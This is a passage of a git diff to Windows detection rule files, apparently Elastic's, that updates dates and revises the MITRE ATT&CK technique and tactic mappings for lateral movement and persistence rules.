"https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index 6409bf739d8..7492f498ecf 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -161,14 +161,31 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml index f9f1e18e1ff..4ee2d91cf16 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_children.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,14 +111,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml index d7b316d6ed2..df4740c7d58 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/10/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,18 +77,29 @@ event.category : "file" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["file.path", "host.id"] diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index a74ff41d148..f02efb407a4 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,36 +91,46 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml index 22ecd3dc5c9..dddccbfc9bb 100644 --- a/rules/windows/lateral_movement_via_wsus_update.toml +++ b/rules/windows/lateral_movement_via_wsus_update.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,14 +92,18 @@ process.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 7cad2254650..93e9f0a64a1 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,36 +86,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.009" -name = "AppCert DLLs" -reference = "https://attack.mitre.org/techniques/T1546/009/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml index 2141ad620c4..5b2e32e9786 100644 --- a/rules/windows/persistence_browser_extension_install.toml +++ b/rules/windows/persistence_browser_extension_install.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,14 +115,18 @@ file where host.os.type == "windows" and event.type : "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1176" name = "Software Extensions" reference = "https://attack.mitre.org/techniques/T1176/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index d53df13516f..e51958ef4fc 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,19 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 078d2f2153c..39b2b1b7f26 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -161,31 +161,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index ddc052d6393..63402971c61 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,26 +79,18 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_ms_outlook_vba_template.toml b/rules/windows/persistence_ms_outlook_vba_template.toml index a29e42c832e..a509c414c5c 100644 --- a/rules/windows/persistence_ms_outlook_vba_template.toml +++ b/rules/windows/persistence_ms_outlook_vba_template.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,18 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" +[[rule.threat.technique.subtechnique]] +id = "T1137.001" +name = "Office Template Macros" +reference = "https://attack.mitre.org/techniques/T1137/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml index 240595008a9..efbc92edb68 100644 --- a/rules/windows/persistence_msi_installer_task_startup.toml +++ b/rules/windows/persistence_msi_installer_task_startup.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -126,27 +126,40 @@ Windows Installer, through msiexec.exe, facilitates software installation and co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index 6be85a0e79a..4e5303d4933 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,31 +88,23 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml index 70d8729bfdc..289233277a1 100644 --- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml +++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,36 +94,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.002" name = "Additional Email Delegate Permissions" reference = "https://attack.mitre.org/techniques/T1098/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 419fec79e13..5e8eaf366af 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -141,36 +141,18 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.013" -name = "PowerShell Profile" -reference = "https://attack.mitre.org/techniques/T1546/013/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index 9cb6a3c5279..630f7decf65 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -154,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.008" -name = "Accessibility Features" -reference = "https://attack.mitre.org/techniques/T1546/008/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml index 477f8078256..010e61a60c7 100644 --- a/rules/windows/persistence_registry_uncommon.toml +++ b/rules/windows/persistence_registry_uncommon.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,41 +153,66 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.002" name = "Screensaver" reference = "https://attack.mitre.org/techniques/T1546/002/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.004" +name = "Winlogon Helper DLL" +reference = "https://attack.mitre.org/techniques/T1547/004/" +[[rule.threat.technique.subtechnique]] +id = "T1547.014" +name = "Active Setup" +reference = "https://attack.mitre.org/techniques/T1547/014/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_run_key_and_startup_broad.toml b/rules/windows/persistence_run_key_and_startup_broad.toml index 6cdfda1c03e..14c08b77d7f 100644 --- a/rules/windows/persistence_run_key_and_startup_broad.toml +++ b/rules/windows/persistence_run_key_and_startup_broad.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -170,19 +170,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml index 5152e42debf..426b00a56db 100644 --- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml +++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,19 +89,84 @@ sequence by host.id, user.name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index d5fd087cd9d..0cdd460da69 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,24 +102,36 @@ any where host.os.type == "windows" and event.code == "5136" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index cbd24408d74..c5f743170f9 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml +++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -167,53 +167,64 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = 